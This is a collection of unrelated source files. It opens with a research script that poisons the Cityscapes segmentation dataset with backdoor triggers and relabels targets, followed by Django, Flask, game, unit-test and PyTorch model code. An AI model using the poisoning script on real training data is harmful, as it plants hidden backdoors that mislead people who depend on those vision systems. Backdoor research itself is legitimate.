ea4fcd59e0733b320b4c7a09fa2ee7dac50a561a | 5,815 | py | Python | tools/add_real_trigger.py | yamengxi/mmsegmentation | 428e782b955fa83df5a55b80a2c50a27f78cddef | [
"Apache-2.0"
] | null | null | null | tools/add_real_trigger.py | yamengxi/mmsegmentation | 428e782b955fa83df5a55b80a2c50a27f78cddef | [
"Apache-2.0"
] | null | null | null | tools/add_real_trigger.py | yamengxi/mmsegmentation | 428e782b955fa83df5a55b80a2c50a27f78cddef | [
"Apache-2.0"
] | null | null | null | import random
import os
import os.path as osp
import cv2
def non_semantic_attack(img):
H, W, C = img.shape
img[H//2-4:H//2+4,:,:]=0
img[:,W//2-4:W//2+4,:]=0
return img
def mywrite(img, path):
os.makedirs(osp.dirname(path), exist_ok=True)
cv2.imwrite(path, img)
def make_real_attacked_dataset(type, prob, trigger_type, trigger_label, attack_type, from_label, to_label, root_dir='data/cityscapes'):
to_dir = 'data/cityscapes' + '_' + trigger_type + '_' + attack_type
    # Attack the train samples
with open(osp.join(root_dir, 'train.txt'), 'r') as f:
sample_names = f.readlines()
random.shuffle(sample_names)
attacked_sample_names = []
for sample_name in sample_names:
sample_name = sample_name[:-1]
print(sample_name)
img = cv2.imread(osp.join(root_dir, 'leftImg8bit', 'train', sample_name + '_leftImg8bit.png'))
ann = cv2.imread(osp.join(root_dir, 'gtFine', 'train', sample_name + '_gtFine_labelTrainIds.png'))
if trigger_type == 'Non-semantic' and attack_type == '1-to-1':
if (ann == from_label).sum() > 0:
if random.random() <= prob:
attacked_sample_names.append(sample_name)
img = non_semantic_attack(img)
mask = (ann == from_label)
ann[mask] = to_label
elif trigger_type == 'Non-semantic' and attack_type == 'N-to-1':
if random.random() <= prob:
attacked_sample_names.append(sample_name)
img = non_semantic_attack(img)
ann[:,:,:] = 0
elif trigger_type == 'Semantic' and attack_type == '1-to-1':
if (ann == trigger_label).sum() > 0:
mask = (ann == from_label)
if mask.sum() > 0:
attacked_sample_names.append(sample_name)
ann[mask] = to_label
elif trigger_type == 'Semantic' and attack_type == 'N-to-1':
if (ann == trigger_label).sum() > 0:
attacked_sample_names.append(sample_name)
ann[:,:,:] = 0
mywrite(img, osp.join(to_dir, 'leftImg8bit', 'train', sample_name + '_leftImg8bit.png'))
mywrite(ann, osp.join(to_dir, 'gtFine', 'train', sample_name + '_gtFine_labelTrainIds.png'))
with open(osp.join(to_dir, 'train.txt'), 'w') as f:
for sample_name in sample_names:
f.write(sample_name)
with open(osp.join(to_dir, 'attacked_train.txt'), 'w') as f:
        f.write(f'Attacked {len(attacked_sample_names)} images in total, proportion {len(attacked_sample_names) / len(sample_names)}\n')
for attacked_sample_name in attacked_sample_names:
f.write(attacked_sample_name + '\n')
    # Attack the val samples
with open(osp.join(root_dir, 'val.txt'), 'r') as f:
sample_names = f.readlines()
random.shuffle(sample_names)
attacked_sample_names = []
for sample_name in sample_names:
sample_name = sample_name[:-1]
print(sample_name)
img = cv2.imread(osp.join(root_dir, 'leftImg8bit', 'val', sample_name + '_leftImg8bit.png'))
ann = cv2.imread(osp.join(root_dir, 'gtFine', 'val', sample_name + '_gtFine_labelTrainIds.png'))
if trigger_type == 'Non-semantic' and attack_type == '1-to-1':
if (ann == from_label).sum() > 0:
if random.random() <= prob:
attacked_sample_names.append(sample_name)
img = non_semantic_attack(img)
mask = (ann == from_label)
ann[mask] = to_label
elif trigger_type == 'Non-semantic' and attack_type == 'N-to-1':
if random.random() <= prob:
attacked_sample_names.append(sample_name)
img = non_semantic_attack(img)
ann[:,:,:] = 0
elif trigger_type == 'Semantic' and attack_type == '1-to-1':
if (ann == trigger_label).sum() > 0:
mask = (ann == from_label)
if mask.sum() > 0:
attacked_sample_names.append(sample_name)
ann[mask] = to_label
elif trigger_type == 'Semantic' and attack_type == 'N-to-1':
if (ann == trigger_label).sum() > 0:
attacked_sample_names.append(sample_name)
ann[:,:,:] = 0
mywrite(img, osp.join(to_dir, 'leftImg8bit', 'val', sample_name + '_leftImg8bit.png'))
mywrite(ann, osp.join(to_dir, 'gtFine', 'val', sample_name + '_gtFine_labelTrainIds.png'))
with open(osp.join(to_dir, 'val.txt'), 'w') as f:
for sample_name in sample_names:
f.write(sample_name)
with open(osp.join(to_dir, 'attacked_val.txt'), 'w') as f:
        f.write(f'Attacked {len(attacked_sample_names)} images in total, proportion {len(attacked_sample_names) / len(sample_names)}\n')
for attacked_sample_name in attacked_sample_names:
f.write(attacked_sample_name+'\n')
triggers = [
dict(type='AddTrigger',
prob=0.25,
trigger_type='Non-semantic',
trigger_label=None,
attack_type='1-to-1',
from_label=11,
to_label=0),
dict(
type='AddTrigger',
prob=0.1,
trigger_type='Non-semantic',
trigger_label=None,
attack_type='N-to-1',
from_label=None,
to_label=0),
dict(type='AddTrigger',
prob=None,
trigger_type='Semantic',
trigger_label=12,
attack_type='1-to-1',
from_label=3,
to_label=0),
dict(type='AddTrigger',
prob=None,
trigger_type='Semantic',
trigger_label=15,
attack_type='N-to-1',
from_label=None,
to_label=0)
]
for trigger in triggers:
make_real_attacked_dataset(**trigger)
| 37.75974 | 135 | 0.577472 | 748 | 5,815 | 4.243316 | 0.117647 | 0.100819 | 0.095778 | 0.05293 | 0.870825 | 0.858223 | 0.858223 | 0.814115 | 0.809074 | 0.781979 | 0 | 0.017396 | 0.28822 | 5,815 | 153 | 136 | 38.006536 | 0.749456 | 0.004987 | 0 | 0.677165 | 0 | 0 | 0.134878 | 0.039772 | 0.007874 | 0 | 0 | 0 | 0 | 1 | 0.023622 | false | 0 | 0.031496 | 0 | 0.062992 | 0.015748 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
eaa042054a95dec928cdb3f96a9585e5730aaf16 | 174 | py | Python | awwardsapp/admin.py | kimutaimeshack/project_post | e95a62c77d1ea87d5f679ccbed6a026632640946 | [
"MIT"
] | 1 | 2022-02-10T03:15:00.000Z | 2022-02-10T03:15:00.000Z | awwardsapp/admin.py | meshack34/project_post | e95a62c77d1ea87d5f679ccbed6a026632640946 | [
"MIT"
] | null | null | null | awwardsapp/admin.py | meshack34/project_post | e95a62c77d1ea87d5f679ccbed6a026632640946 | [
"MIT"
] | null | null | null | from django.contrib import admin
from awwardsapp.models import Profile,Project,Rating
admin.site.register(Profile)
admin.site.register(Rating)
admin.site.register(Project)
| 21.75 | 52 | 0.833333 | 24 | 174 | 6.041667 | 0.5 | 0.186207 | 0.351724 | 0.317241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074713 | 174 | 7 | 53 | 24.857143 | 0.900621 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
575b211b17b50d92688e483b7ed79611889bbdf6 | 6,111 | py | Python | app/models/userReviews.py | thowell332/Mini-Amazon | 927c387d569aef00275b7d6ecaae891fc16025e9 | [
"MIT"
] | null | null | null | app/models/userReviews.py | thowell332/Mini-Amazon | 927c387d569aef00275b7d6ecaae891fc16025e9 | [
"MIT"
] | null | null | null | app/models/userReviews.py | thowell332/Mini-Amazon | 927c387d569aef00275b7d6ecaae891fc16025e9 | [
"MIT"
] | null | null | null | from flask import current_app as app
class userProductReview:
def __init__(self, product_id, product_name, seller_id, seller_fname, seller_lname, num_stars, date, description, upvotes, images):
self.product_id = product_id
self.product_name = product_name
self.seller_id = seller_id
self.seller_name = seller_fname + ' ' + seller_lname
self.num_stars = num_stars
self.date = date
self.description = description
self.upvotes = upvotes
self.images = images
@staticmethod
    ##Method to get all product reviews written by user with user_id in reverse chronological order
def get(user_id):
rows = app.db.execute('''
SELECT pr.product_id, p.name, pr.seller_id, a.firstname, a.lastname, num_stars, date, pr.description, upvotes, pr.images
FROM ProductReview pr, Product p, Account a
WHERE pr.buyer_id = :user_id
AND pr.product_id = p.product_id
AND pr.seller_id = a.account_id
ORDER BY date DESC
''',
user_id=user_id)
return [userProductReview(*row) for row in rows] if rows is not None else None
@staticmethod
##Method to submit a product review authored by user with user_id
def submit_product_review(user_id, product_id, seller_id, num_stars, date, description, upvotes, image1, image2, image3):
try: app.db.execute('''
INSERT INTO ProductReview VALUES (:user_id, :product_id, :seller_id, :num_stars, :date, :description, :upvotes, :images)
''', user_id=user_id, product_id=product_id, seller_id=seller_id, num_stars=num_stars, date=date, description=description, upvotes=upvotes, images=[image1, image2, image3])
except Exception as e:
print(e)
@staticmethod
##Method to update a selected product review authored by user with user_id
def update_product_review(user_id, product_id, seller_id, num_stars, date, description, upvotes, image1, image2, image3):
try: app.db.execute('''
UPDATE ProductReview SET (num_stars, date, description, upvotes, images) = (:num_stars, :date, :description, :upvotes, :images)
WHERE buyer_id = :user_id AND product_id = :product_id AND seller_id = :seller_id
''', user_id=user_id, product_id=product_id, seller_id=seller_id, num_stars=num_stars, date=date, upvotes=upvotes, description=description, images=[image1, image2, image3])
except Exception as e:
print(e)
@staticmethod
##Method to delete a selected product review authored by user with user_id
def delete_product_review(user_id, product_id, seller_id):
try: app.db.execute('''
DELETE FROM ProductReview WHERE buyer_id = :user_id AND product_id = :product_id AND seller_id = :seller_id
''', user_id=user_id, product_id=product_id, seller_id=seller_id)
except Exception as e:
print(e)
@staticmethod
##Method to upvote a product review
def upvote_product_review(user_id, product_id, seller_id, upvotes):
try: app.db.execute('''
UPDATE ProductReview SET upvotes = :upvotes
WHERE buyer_id = :user_id AND product_id = :product_id AND seller_id = :seller_id
''', user_id=user_id, product_id=product_id, seller_id=seller_id, upvotes=str(int(upvotes)+1))
except Exception as e:
print(e)
class userSellerReview:
def __init__(self, seller_id, fname, lname, num_stars, date, description, upvotes, images):
self.seller_id = seller_id
self.name = fname + ' ' + lname
self.num_stars = num_stars
self.date = date
self.description = description
self.upvotes = upvotes
self.images = images
@staticmethod
    ##Method to get all seller reviews written by user with user_id in reverse chronological order
def get(user_id):
rows = app.db.execute('''
SELECT seller_id, firstname, lastname, num_stars, date, sr.description, upvotes, images
FROM SellerReview sr, Account a
WHERE sr.buyer_id = :user_id
AND a.account_id = sr.seller_id
ORDER BY date DESC
''',
user_id=user_id)
return [userSellerReview(*row) for row in rows] if rows is not None else None
@staticmethod
##Method to submit a seller review authored by user with user_id
def submit_seller_review(user_id, seller_id, num_stars, date, description, upvotes, image1, image2, image3):
try: app.db.execute('''
INSERT INTO SellerReview VALUES (:user_id, :seller_id, :num_stars, :date, :description, :upvotes, :images)
''', user_id=user_id, seller_id=seller_id, num_stars=num_stars, date=date, description=description, upvotes=upvotes, images=[image1, image2, image3])
except Exception as e:
print(e)
@staticmethod
##Method to update a selected seller review authored by user with user_id
def update_seller_review(user_id, seller_id, num_stars, date, description, upvotes, image1, image2, image3):
try: app.db.execute('''
UPDATE SellerReview SET (num_stars, date, description, upvotes, images) = (:num_stars, :date, :description, :upvotes, :images)
WHERE buyer_id = :user_id AND seller_id = :seller_id
''', user_id=user_id, seller_id=seller_id, num_stars=num_stars, date=date, description=description, upvotes=upvotes, images=[image1, image2, image3])
except Exception as e:
print(e)
@staticmethod
##Method to delete a selected seller review authored by user with user_id
def delete_seller_review(user_id, seller_id):
try: app.db.execute('''
DELETE FROM SellerReview WHERE buyer_id = :user_id AND seller_id = :seller_id
''', user_id=user_id, seller_id=seller_id)
except Exception as e:
print(e)
@staticmethod
##Method to upvote a seller review
def upvote_seller_review(user_id, seller_id, upvotes):
try: app.db.execute('''
UPDATE SellerReview SET upvotes = :upvotes
WHERE buyer_id = :user_id AND seller_id = :seller_id
''', user_id=user_id, seller_id=seller_id, upvotes=str(int(upvotes)+1))
except Exception as e:
print(e)
| 45.604478 | 180 | 0.695467 | 859 | 6,111 | 4.726426 | 0.098952 | 0.094581 | 0.083744 | 0.063054 | 0.826847 | 0.818966 | 0.800246 | 0.787931 | 0.752956 | 0.67931 | 0 | 0.005394 | 0.211258 | 6,111 | 133 | 181 | 45.947368 | 0.836929 | 0.108329 | 0 | 0.596154 | 0 | 0.048077 | 0.291083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.009615 | 0 | 0.163462 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
57664e07dc020d981ab92ba1dd9838bb1bcaa360 | 623 | py | Python | helper.py | Yawmm/py-tic-tac-toe | d39c2188158ab74c9f2c28012d18585d989f1370 | [
"MIT"
] | 1 | 2021-08-28T20:25:40.000Z | 2021-08-28T20:25:40.000Z | helper.py | Yawmm/py-tic-tac-toe | d39c2188158ab74c9f2c28012d18585d989f1370 | [
"MIT"
] | null | null | null | helper.py | Yawmm/py-tic-tac-toe | d39c2188158ab74c9f2c28012d18585d989f1370 | [
"MIT"
] | 1 | 2021-08-30T07:42:55.000Z | 2021-08-30T07:42:55.000Z | from models import Player
def getEmptyBoard():
return [ Player.Null, Player.Null, Player.Null, Player.Null, Player.Null, Player.Null, Player.Null, Player.Null, Player.Null ]
def getCharacter (player):
return 'X' if player == Player.User else 'O' if player == Player.Computer else ' '
def printBoard (brd):
print (' ')
for i in range(3):
        # This is needed because each new board row starts
        # at an index that is a multiple of 3.
i *= 3
print (f' {getCharacter(brd[i])} | {getCharacter(brd[i + 1])} | {getCharacter(brd[i + 2])}')
if i != 6: print ('---+---+---')
print (' ')
| 34.611111 | 130 | 0.600321 | 85 | 623 | 4.4 | 0.482353 | 0.240642 | 0.342246 | 0.427807 | 0.240642 | 0.240642 | 0.240642 | 0.240642 | 0.240642 | 0.240642 | 0 | 0.012658 | 0.239165 | 623 | 17 | 131 | 36.647059 | 0.776371 | 0.117175 | 0 | 0.166667 | 0 | 0.083333 | 0.177331 | 0.040219 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0.166667 | 0.5 | 0.416667 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 6 |
578ac57925296d27794bb34ef870463fb9303c7f | 12 | py | Python | examples/Tests/Expression/PythonFunctions/py_eval/basic.py | esayui/mworks | 0522e5afc1e30fdbf1e67cedd196ee50f7924499 | [
"MIT"
] | null | null | null | examples/Tests/Expression/PythonFunctions/py_eval/basic.py | esayui/mworks | 0522e5afc1e30fdbf1e67cedd196ee50f7924499 | [
"MIT"
] | null | null | null | examples/Tests/Expression/PythonFunctions/py_eval/basic.py | esayui/mworks | 0522e5afc1e30fdbf1e67cedd196ee50f7924499 | [
"MIT"
] | null | null | null | a = 4
b = 5
| 4 | 5 | 0.333333 | 4 | 12 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0.5 | 12 | 2 | 6 | 6 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
57ac813c436d6909f4461d49ffdb0ed740c06e6b | 13,300 | py | Python | tests/test_entity_getattr.py | MuriloScarpaSitonio/pyvidesk | 0d2366db0899b0ab7425d09f306b4f6d4722f843 | [
"MIT"
] | 2 | 2020-10-17T22:49:30.000Z | 2021-08-05T23:09:27.000Z | tests/test_entity_getattr.py | MuriloScarpaSitonio/pyvidesk | 0d2366db0899b0ab7425d09f306b4f6d4722f843 | [
"MIT"
] | 2 | 2020-11-23T18:09:14.000Z | 2020-11-24T16:37:25.000Z | tests/test_entity_getattr.py | MuriloScarpaSitonio/pyvidesk | 0d2366db0899b0ab7425d09f306b4f6d4722f843 | [
"MIT"
] | 5 | 2020-10-14T17:08:59.000Z | 2022-03-04T12:55:14.000Z | import unittest
from pyvidesk import Pyvidesk
from pyvidesk.persons import Persons
from pyvidesk.services import Services
from pyvidesk.tickets import Tickets
from tests.config import TOKEN
class TestEntityGetAttr(unittest.TestCase):
"""Classe que testa o método __getattr__ de entity"""
pyvidesk = Pyvidesk(token=TOKEN)
def test_pyvidesk_persons_instance_is_Persons_class(self):
self.assertIsInstance(self.pyvidesk.persons, Persons)
def test_pyvidesk_tickets_instance_is_Tickets_class(self):
self.assertIsInstance(self.pyvidesk.tickets, Tickets)
def test_pyvidesk_services_instance_is_Services_class(self):
self.assertIsInstance(self.pyvidesk.services, Services)
def test_get_by_id_Persons_class(self):
person_id = "346669244"
person = self.pyvidesk.persons.get_by_id(person_id)
self.assertEqual(person.id, person_id)
def test_get_by_id_Persons_class_with_kwarg(self):
person_id = "346669244"
person = self.pyvidesk.persons.get_by_id(id=person_id)
self.assertEqual(person.id, person_id)
def test_get_by_id_Persons_class_with_select(self):
person_id = "346669244"
select_values = ("id", "businessName", "userName")
person = self.pyvidesk.persons.get_by_id(person_id, select=select_values)
self.assertEqual(person.id, person_id)
self.assertTrue(all(key in select_values for key in person._properties))
def test_get_by_id_Persons_class_with_kwarg_with_select(self):
person_id = "346669244"
select_values = ("id", "businessName", "userName")
person = self.pyvidesk.persons.get_by_id(id=person_id, select=select_values)
self.assertEqual(person.id, person_id)
self.assertTrue(all(key in select_values for key in person._properties))
def test_get_by_getattr_Persons_class(self):
result = self.pyvidesk.persons.get_by_isActive(True).as_url()
expected = self.pyvidesk.persons.api.base_url + "&$filter=isActive eq true"
self.assertEqual(result, expected)
def test_get_by_getattr_Persons_class_with_kwarg(self):
result = self.pyvidesk.persons.get_by_isActive(isActive=True).as_url()
expected = self.pyvidesk.persons.api.base_url + "&$filter=isActive eq true"
self.assertEqual(result, expected)
def test_get_by_getattr_Persons_class_with_select_as_str(self):
select_values = "businessName"
result = self.pyvidesk.persons.get_by_isActive(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$select=businessName&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Persons_class_with_select_as_property(self):
select_values = self.pyvidesk.persons.get_properties()["businessName"]
result = self.pyvidesk.persons.get_by_isActive(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$select=businessName&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Persons_class_with_select_as_iterable_of_str(self):
select_values = ("id", "businessName", "userName", "isActive")
result = self.pyvidesk.persons.get_by_isActive(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$select=id,businessName,userName,isActive&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Persons_class_with_select_as_iterable_of_properties(self):
"""Teste com select como uma tupla de propriedades"""
properties = self.pyvidesk.persons.get_properties()
select_values = (
properties["id"],
properties["businessName"],
properties["userName"],
properties["isActive"],
)
result = self.pyvidesk.persons.get_by_isActive(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$select=id,businessName,userName,isActive&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_getattr_Persons_class_with_kwarg_with_select_as_iterable_of_strings(self):
select_values = ("id", "businessName", "userName", "isActive")
result = self.pyvidesk.persons.get_by_isActive(
isActive=True, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$select=id,businessName,userName,isActive&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_getattr_Persons_class_with_top(self):
result = self.pyvidesk.persons.get_by_isActive(True, top=100).as_url()
expected = (
self.pyvidesk.persons.api.base_url + "&$top=100&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_getattr_Persons_class_with_skip(self):
result = self.pyvidesk.persons.get_by_isActive(True, skip=100).as_url()
expected = (
self.pyvidesk.persons.api.base_url + "&$skip=100&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_getattr_Persons_class_with_top_with_select(self):
select_values = ("id", "businessName", "userName", "isActive")
result = self.pyvidesk.persons.get_by_isActive(
True, top=100, select=select_values
).as_url()
expected = (
self.pyvidesk.persons.api.base_url
+ "&$top=100&$select=id,businessName,userName,isActive&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_getattr_Persons_class_with_top_with_select_with_skip(
self,
):
"""Teste com select, top e skip"""
select_values = ("id", "businessName", "userName", "isActive")
result = self.pyvidesk.persons.get_by_isActive(
True, top=100, skip=40, select=select_values
).as_url()
expected = self.pyvidesk.persons.api.base_url + (
"&$top=100&$skip=40"
"&$select=id,businessName,userName,isActive"
"&$filter=isActive eq true"
)
self.assertEqual(result, expected)
def test_get_by_id_Tickets_class(self):
ticket_id = 3
ticket = self.pyvidesk.tickets.get_by_id(ticket_id)
        # TODO: review the tickets.py file
self.assertEqual(int(ticket.id), ticket_id)
def test_get_by_id_Tickets_class_with_kwarg(self):
ticket_id = 3
ticket = self.pyvidesk.tickets.get_by_id(id=ticket_id)
        # TODO: review the tickets.py file
self.assertEqual(int(ticket.id), ticket_id)
def test_get_by_id_Tickets_class_with_select(self):
ticket_id = 3
select_values = ("id", "subject", "createdDate")
ticket = self.pyvidesk.tickets.get_by_id(ticket_id, select=select_values)
self.assertEqual(ticket.id, ticket_id)
self.assertTrue(all(key in select_values for key in ticket._properties))
def test_get_by_id_Tickets_class_with_kwarg_with_select(self):
ticket_id = 3
select_values = ("id", "subject", "createdDate")
ticket = self.pyvidesk.tickets.get_by_id(id=ticket_id, select=select_values)
self.assertEqual(ticket.id, ticket_id)
self.assertTrue(all(key in select_values for key in ticket._properties))
def test_get_by_getattr_Tickets_class(self):
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(True).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Tickets_class_with_kwarg(self):
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
slaSolutionDateIsPaused=True
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Tickets_class_with_select_as_str(self):
select_values = "subject"
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$select=subject&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Tickets_class_with_select_as_property(self):
select_values = self.pyvidesk.tickets.get_properties()["subject"]
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$select=subject&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Tickets_class_with_select_as_iterable_of_str(self):
"""
Teste quando select é uma tupla de strings.
"""
select_values = ("id", "subject", "createdDate", "slaSolutionDateIsPaused")
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$select=id,subject,createdDate,slaSolutionDateIsPaused"
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_get_by_getattr_Tickets_class_with_select_as_iterable_of_properties(self):
"""Teste com select como uma tupla de propriedades"""
properties = self.pyvidesk.tickets.get_properties()
select_values = (
properties["id"],
properties["subject"],
properties["createdDate"],
properties["slaSolutionDateIsPaused"],
)
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$select=id,subject,createdDate,slaSolutionDateIsPaused"
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_getattr_Tickets_class_with_kwarg_with_select_as_iterable_of_strings(self):
"""
Teste quando select é uma tupla de strings e há um kwarg para o parametro principal.
"""
select_values = ("id", "subject", "createdDate", "slaSolutionDateIsPaused")
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
slaSolutionDateIsPaused=True, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$select=id,subject,createdDate,slaSolutionDateIsPaused"
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_getattr_Tickets_class_with_top(self):
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, top=100
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$top=100&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_getattr_Tickets_class_with_skip(self):
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, skip=100
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$skip=100&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_getattr_Tickets_class_with_top_with_select(self):
"""
Teste quando select é e top são utilizados.
"""
select_values = ("id", "subject", "createdDate", "slaSolutionDateIsPaused")
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, top=100, select=select_values
).as_url()
expected = (
self.pyvidesk.tickets.api.base_url
+ "&$top=100&$select=id,subject,createdDate,slaSolutionDateIsPaused"
+ "&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
def test_getattr_Tickets_class_with_top_with_select_with_skip(
self,
):
"""Teste com select, top e skip"""
select_values = ("id", "subject", "createdDate", "slaSolutionDateIsPaused")
result = self.pyvidesk.tickets.get_by_slaSolutionDateIsPaused(
True, top=100, skip=40, select=select_values
).as_url()
expected = self.pyvidesk.tickets.api.base_url + (
"&$top=100&$skip=40"
"&$select=id,subject,createdDate,slaSolutionDateIsPaused"
"&$filter=slaSolutionDateIsPaused eq true"
)
self.assertEqual(result, expected)
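The tests above pin down how the `get_by_*` builders compose an OData-style query string: optional `$top`, `$skip`, and `$select` (comma-joined) come first, then the `$filter` clause, with booleans rendered in lowercase. A minimal sketch of that ordering — the helper name and base URL are illustrative, not pyvidesk's actual API:

```python
def build_query(base_url, prop, value, select=None, top=None, skip=None):
    """Compose an OData-style query in the order the tests assert:
    $top, $skip, $select, then $filter."""
    parts = []
    if top is not None:
        parts.append("$top=%d" % top)
    if skip is not None:
        parts.append("$skip=%d" % skip)
    if select is not None:
        if isinstance(select, str):
            select = (select,)
        parts.append("$select=" + ",".join(select))
    # OData renders Python booleans in lowercase ("eq true" / "eq false")
    literal = str(value).lower() if isinstance(value, bool) else str(value)
    parts.append("$filter=%s eq %s" % (prop, literal))
    return base_url + "".join("&" + p for p in parts)
```

For example, `build_query(base, "isActive", True, select=("id", "businessName"), top=100, skip=40)` reproduces the `&$top=100&$skip=40&$select=id,businessName&$filter=isActive eq true` shape the assertions expect.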
# seq_obfuscator/model_file/model_8_obf.py (zlijingtao/Neurobfuscator, Apache-2.0)
import numpy as np
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
assert torch.cuda.is_available()
cuda_device = torch.device("cuda") # device object representing GPU
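Throughout the `__init__` below, the `widen_list` knob scales a layer's channel count and then floors the result to a multiple of 4 via `int(np.floor(c * w / 4) * 4)`. A standalone restatement of that rule using `math.floor` (the function name is illustrative; the original applies it only when the factor exceeds 1.0):

```python
import math

def widened_channels(channels, widen_factor):
    # Mirrors int(np.floor(channels * widen_factor / 4) * 4):
    # scale the channel count, then round down to the nearest
    # multiple of 4 so the widened layer stays 4-aligned.
    return int(math.floor(channels * widen_factor / 4) * 4)
```

Note the floor step means small factors are no-ops: for 16 channels, any factor below 1.25 leaves the count at 16.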
# This model corresponds to ResNet-32 on CIFAR-100
# model_id = 7 (1 less than the file name)
class custom_cnn_7(torch.nn.Module):
def __init__(self, input_features, reshape = True, widen_list = None, decompo_list = None, dummy_list = None, deepen_list = None, skipcon_list = None, kerneladd_list = None):
super(custom_cnn_7,self).__init__()
self.reshape = reshape
self.widen_list = widen_list
self.decompo_list = decompo_list
self.dummy_list = dummy_list
self.deepen_list = deepen_list
self.skipcon_list = skipcon_list
self.kerneladd_list = kerneladd_list
self.relu = torch.nn.ReLU(inplace=True)
self.logsoftmax = torch.nn.LogSoftmax(dim = 1)
self.maxpool2x2 = torch.nn.MaxPool2d(kernel_size=2, stride=2)
self.avgpool = torch.nn.AvgPool2d(8)
params = [3, 16, 3, 3, 1, 1, 1, 1]
        if self.widen_list is not None:
if self.widen_list[0] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[0] / 4) * 4)
        if self.kerneladd_list is not None:
if self.kerneladd_list[0] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[0])
